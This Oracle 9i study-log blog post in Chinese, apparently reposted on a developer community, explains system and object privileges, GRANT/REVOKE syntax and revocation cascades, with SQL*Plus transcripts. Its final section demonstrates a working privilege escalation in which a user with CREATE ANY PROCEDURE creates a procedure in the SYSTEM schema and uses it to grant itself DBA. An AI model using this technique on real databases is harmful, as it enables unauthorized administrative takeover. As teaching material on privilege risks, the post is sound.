我的Oracle 9i学习日志(22)-- 权限管理-阿里云开发者社区

开发者社区> 余二五> 正文

我的Oracle 9i学习日志(22)-- 权限管理

简介:
+关注继续查看

两种用户权限:

System:允许用户执行特定的数据库操作或某类数据库操作,例如,创建表空间的权限就是一种系统权限。
Object:限都允许用户对特定对象(如表、视图、序列、过程、函数或程序包)执行特定的操作。
• 100 多种不同的系统权限。
系统权限可分为以下几类:
• 允许执行系统范围操作的权限;如CREATE SESSIONCREATE TABLESPACE
• 允许管理用户自己方案中的对象的权限;如CREATE TABLE
• 允许管理任何方案中的对象的权限;如CREATE ANY TABLE
可使用DDL 命令GRANT REVOKE 控制权限,这两个命令为用户或角色添加和撤消系统权限。
系统权限举例

1
• 没有CREATE INDEX 权限。
• CREATE TABLE 包括CREATE INDEX ANALYZE 命令。用户必须有表空间的限额,或必须被授予UNLIMITED TABLESPACE 权限。
• 诸如CREATE TABLECREATE PROCEDURE CREATE CLUSTER 等权限包括删除这些对象的权限。
• 无法将UNLIMITED TABLESPACE 授予角色。
• DROP ANY TABLE 权限是截断另一方案中的表所必需的。
例:
SQL> create user user1 identified by user1 default tablespace luo;
 
User created.
 
SQL> grant create session to user1 ;
 
Grant succeeded.
 
SQL> grant create table to user1;
 
Grant succeeded.
 
SQL> create user user2 identified by user2 default tablespace luo quota 20m on luo;
 
User created.
 
SQL> grant create session to user2;
 
Grant succeeded.
 
SQL> grant create table to user2;
 
Grant succeeded.
 
SQL> conn user1/user1;
Connected.
SQL> show user
USER is "USER1"
SQL> select * from session_privs;
 
PRIVILEGE
----------------------------------------
CREATE SESSION
CREATE TABLE
 
SQL> create table test(id int);
create table test(id int)
*
ERROR at line 1:
ORA-01950: no privileges on tablespace 'LUO'
 
SQL> conn user2/user2;
Connected.
SQL> show user
USER is "USER2"
SQL> select * from session_privs;
 
PRIVILEGE
----------------------------------------
CREATE SESSION
CREATE TABLE
 
SQL> create table test2(id int);
 
Table created.
授予系统权限
使用SQL 语句GRANT 为用户授予系统权限。
被授予者可通过ADMIN 选项进一步为其他用户授予系统权限。使用ADMIN 选项授予系统权限时应小心。这样的权限通常只限于安全管理员使用,很少授予其他用户。
GRANT {system_privilege|role}
[, {system_privilege|role} ]...
TO {user|role|PUBLIC}
[, {user|role|PUBLIC} ]...
[WITH ADMIN OPTION]
其中:
system_privilege:指定要授予的系统权限
Role:指定要授予的角色名
PUBLIC:将系统权限授予所有用户
WITH ADMIN OPTION:允许被授予者进一步为其他用户或角色授予权限或角色
Grant any object privilege:见授予对象权限。
两个特殊角色:

2
只有数据库管理员可以使用管理员权限与数据库连接。以SYSDBA 身份连接可以授予用户不受限制的权限,以便对数据库或数据库中的对象执行任何操作。
系统权限限制
Oracle9i 中的字典保护机制可防止未经授权的用户访问字典对象。
只有角色SYSDBA SYSOPER 可以访问字典对象。允许访问其他方案中的对象的系统权限并不授予您对字典对象的访问权限。例如,SELECT ANY TABLE 权限允许访问其它方案中的视图和表,但不允许选择字典对象(基表、视图、程序包和同义词)。
如果 O7_DICTIONARY_ACCESSIBILITY参数设置为TRUE, 则允许访问SYS 方案中的对象(Oracle7 行为)。如果该参数设置为FALSE,则允许访问其它方案中的对象的SYSTEM 权限不允许访问字典方案中的对象。
例如,如果O7_DICTIONARY_ACCESSIBILITY=FALSE,则SELECT ANY TABLE 语句将允许访问除SYS 方案外的任何方案中的视图或表(例如,不能访问字典)。系统权限EXECUTE ANY PROCEDURE 将允许访问除SYS 方案外的任何其它方案中的过程。
实验:
SQL> grant select any table to user1;
 
Grant succeeded.
SQL> show parameter o7
 
NAME                                 TYPE        VALUE
------------------------------------ ----------- ------------------------------
O7_DICTIONARY_ACCESSIBILITY          boolean     FALSE
 
SQL> conn user1/user1
Connected.
SQL> select tablespace_name from dba_tablespaces;
select tablespace_name from dba_tablespaces
                            *
ERROR at line 1:
ORA-00942: table or view does not exist
 
SQL> conn /as sysdba
SQL> alter system set O7_DICTIONARY_ACCESSIBILITY=true scope=spfile;
 
System altered.
 
SQL> shutdown immediate
SQL> startup
SQL> show parameter o7
 
NAME                                 TYPE        VALUE
------------------------------------ ----------- ------------------------------
O7_DICTIONARY_ACCESSIBILITY          boolean     TRUE
 
SQL> conn user1/user1
Connected.
SQL> select tablespace_name from dba_tablespaces;
 
TABLESPACE_NAME
------------------------------
SYSTEM
UNDOTBS1
TEMP
。。。。。。
 
撤消系统权限
可以使用REVOKE SQL 语句撤消系统权限。使用ADMIN OPTION 授予系统权限的用户可以撤消任何其他数据库用户的权限。撤消者不必是原先授予该权限的那个用户。
REVOKE {system_privilege|role}
[, {system_privilege|role} ]...
FROM {user|role|PUBLIC}
[, {user|role|PUBLIC} ]...
注:
• REVOKE 命令只能撤消使用GRANT 命令直接授予的权限(即不包括角色的权限)。
• 撤消系统权限可能对一些相关对象有影响。例如,如果将SELECT ANY TABLE 授予某用户,而该用户已创建了使用其它方案中的表的过程或视图,则撤消该权限将使这些过程或视图无效。

3
情况:
1. DBA 使用ADMIN OPTION 将系统权限CREATE TABLE 授予Jeff
2. Jeff 创建一个表。
3. Jeff 将系统权限CREATE TABLE 授予Emi
4. Emi 创建一个表。
5. DBA 撤消Jeff CREATE TABLE 系统权限。
结果:
Jeff 的表依然存在,但是,无法创建新表。
Emi 的表依然存在,并且她仍然拥有CREATE TABLE 系统权限。
Tips:

图4
对象权限

图5
对象权限是一种对于特定的表、视图、序列、过程、函数或程序包执行特定操作的一种权限或权利。上表列出了各种对象的权限。需要注意的是适用于序列的权限只有SELECT ALTER。通过指定可更新列的子集可以对UPDATEREFERENCES INSERT 权限加以限制。通过用列的子集创建视图并授予对于该视图的SELECT 权限,则可对SELECT 权限加以限制。对于同义词的授权会转换为对于该同义词所引用的基表的授权。
授予对象权限
GRANT { object_privilege [(column_list)]
[, object_privilege [(column_list)] ]...
|ALL [PRIVILEGES]}
ON [schema.]object
TO {user|role|PUBLIC}[, {user|role|PUBLIC} ]...
[WITH GRANT OPTION]
其中:
object_privilege:指定要授予的对象权限
column_list:指定表或视图列(只在授予INSERTREFERENCES UPDATE 权限时才指定。)
ALL:将所有权限授予已被授予WITH GRANT OPTION 的对象
ON object:标识将要被授予权限的对象
WITH GRANT OPTION:使被授予者能够将对象权限授予其他用户或角色
使用GRANT 语句授予对象权限。
• 要授予权限,对象必须在自己的方案中(除非已被授予Grant any object privilege权限),或者已通过GRANT OPTION 被授予权限。
• 缺省情况下,如果拥有某个对象,则自动获得对该对象的所有权限。
• 若有安全方面的考虑,则将您的对象权限授予其他用户时应谨慎。
WITH GRANT OPTION clause
Specify WITH GRANT OPTION to enable the grantee to grant the object privileges to other users and roles. The user whose schema contains an object is automatically granted all associated object privileges with the GRANT OPTION. This special privilege allows the grantee several expanded privileges:
• The grantee can grant the object privilege to any users in the database, with or without the GRANT OPTION, or to any role in the database.
• If both of the following are true, the grantee can create views on the table and grant the corresponding privileges on the views to any user or role in the database:
The grantee receives object privileges for the table with the GRANT OPTION.
The grantee has the CREATE VIEW or CREATE ANY VIEW system privilege
例:
SQL> conn user1/user1;
Connected.
SQL> select * from luo.orders;
select * from luo.orders
                  *
ERROR at line 1:
ORA-00942: table or view does not exist
SQL> conn user1/user1
Connected.
SQL> grant select on orders to user1;
 
Grant succeeded.
SQL> conn user1/user1
Connected.
SQL> select * from luo.orders;
 
    ORD_ID ORD_DATE CUS DATE_OF_D PRODUCT_ID
---------- --------- --- --------- ----------
       610 11-NOV-97 A01
       611 15-NOV-97 A02
Grant any object privilege
SQL> conn luo/luo
Connected.
SQL> select * from user2.t;
select * from user2.t
                    *
ERROR at line 1:
ORA-00942: table or view does not exist
 
 
SQL> conn user1/user1;
Connected.
SQL> select * from user2.t;
select * from user2.t
                    *
ERROR at line 1:
ORA-00942: table or view does not exist
 
sys用户登录赋予luo grant any object privileges权限:
SQL> grant grant any object privileges to luo;
 
Grant succeeded.
 
SQL> conn luo/luo
Connected.
SQL> select * from session_privs;
 
PRIVILEGE
----------------------------------------
。。。。。。
GRANT ANY OBJECT PRIVILEGE
 
15 rows selected.
 
SQL> select * from user2.t;
select * from user2.t
                    *
ERROR at line 1:
ORA-01031: insufficient privileges
#luo本身无操作这些对象的权限。
 
SQL> grant select on user2.t to user1;
 
Grant succeeded.
 
SQL> conn user1/user1;
Connected.
SQL> select * from user2.t;
 
        ID
----------
         1
 
撤消对象权限
REVOKE 语句用来撤消对象权限。要撤消对象权限,撤消者必须是将被撤消的对象权限的原始授予者。
使用下列命令撤消对象权限:
REVOKE { object_privilege
[, object_privilege ]...
| ALL [PRIVILEGES] }
ON [schema.]object
FROM {user|role|PUBLIC}
[, {user|role|PUBLIC} ]...
[CASCADE CONSTRAINTS]
其中:
object_privilege:指定将撤消的对象权限
ALL:撤消已授予用户的所有对象权限
ON:标识将撤消其对象权限的对象
FROM:标识将撤消其对象权限的用户或角色
CASCADE CONSTRAINTS:删除撤消使用REFERENCES ALL 权限定义的任何引用完整性约束
限制:
授予者只能对其已经授予权限的用户撤消对象权限。

图6
情况:
• 通过GRANT OPTION 授予Jeff 对于EMPLOYEES SELECT 对象权限。
• Jeff 将对于EMPLOYEES SELECT 权限授予Emi
• 之后,撤消Jeff SELECT 权限。该撤消也对Emi 产生级联影响。
Tips

 

7
 
获取信息:
• DBA_SYS_PRIVS
• SESSION_PRIVS
• DBA_TAB_PRIVS
• DBA_COL_PRIVS
 
安全漏洞演示:
SQL> create user hacker identified by hacker default tablespace luo quota 
 2 unlimited on luo;
 
User created.
 
SQL> grant create session to hacker;
 
Grant succeeded.
 
SQL> grant create any procedure,execute any procedure to hacker;
 
Grant succeeded.
 
SQL> conn hacker/hacker;
Connected.
SQL> show user
USER is "HACKER"
SQL> select * from session_privs;
 
PRIVILEGE
----------------------------------------
CREATE SESSION
CREATE ANY PROCEDURE
EXECUTE ANY PROCEDURE
 
SQL> select * from session_roles;
 
ROLE
------------------------------
PLUSTRACE
 
SQL> create procedure system.h(h_str in varchar2) as
 2 begin
 3 execute immediate h_str;
 4 end;
 5 /
 
Procedure created.
 
SQL> execute system.h('grant dba to hacker');
 
PL/SQL procedure successfully completed.
 
SQL> select * from session_privs;
 
PRIVILEGE
----------------------------------------
CREATE SESSION
UNLIMITED TABLESPACE
CREATE ANY PROCEDURE
EXECUTE ANY PROCEDURE
 
SQL> conn hacker/hacker
Connected.
SQL> select * from session_roles;
 
ROLE
------------------------------
PLUSTRACE
DBA
SELECT_CATALOG_ROLE
HS_ADMIN_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
IMP_FULL_DATABASE
GATHER_SYSTEM_STATISTICS
WM_ADMIN_ROLE
JAVA_ADMIN
 
ROLE
------------------------------
JAVA_DEPLOY
XDBADMIN
OLAP_DBA
 
14 rows selected.









本文转自 d185740815 51CTO博客,原文链接:http://blog.51cto.com/luotaoyang/296315,如需转载请自行联系原作者

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
Oracle学习笔记之与权限相关的视图
Oracle学习笔记之与权限相关的视图
106 0
【RAC】 oracleasm 工具对应的日志记录
因为删除Clusterware之后,ocr还在磁盘中,使用dd命令格式化磁盘,但是oracle提供了oracleasm工具,所以看看oracleasm deletedisk的操作具体做了什么 -----------------------------------...
595 0
怎么设置阿里云服务器安全组?阿里云安全组规则详细解说
阿里云服务器安全组设置规则分享,阿里云服务器安全组如何放行端口设置教程
6896 0
【oracle】关于日志产生量的计算
根据每日归档的生成量,可以反过来估计每日的数据库活动性及周期性,并决定空间分配的问题!1.计算归档日志的生产量:select name,completion_time,BLOCKS * BLOCK_SIZE/1024/1024 MB from v$archived_log where rownum 2.
528 0
Oracle 从备份恢复缺失的归档日志
1、查询需要恢复时间段的归档日志 select * from v$archive_log where to_date('2020-05-07 18:32:20','yyyy-mm-dd hh24:mi:ss') between first_time and next_time; rman> list backup of archivelog from logseq .
3456 0
Oracle学习笔记之后台进程
Oracle的后台进程,是在平时运维中必须要了解的知识,了解后台进程的作用,能够让你更快的从alter中定位到问题,接下来就简单介绍下常见的几个后台进程。
133 0
+关注
12613
文章
0
问答
文章排行榜
最热
最新
相关电子书
更多
文娱运维技术
立即下载
《SaaS模式云原生数据仓库应用场景实践》
立即下载
《看见新力量:二》电子书
立即下载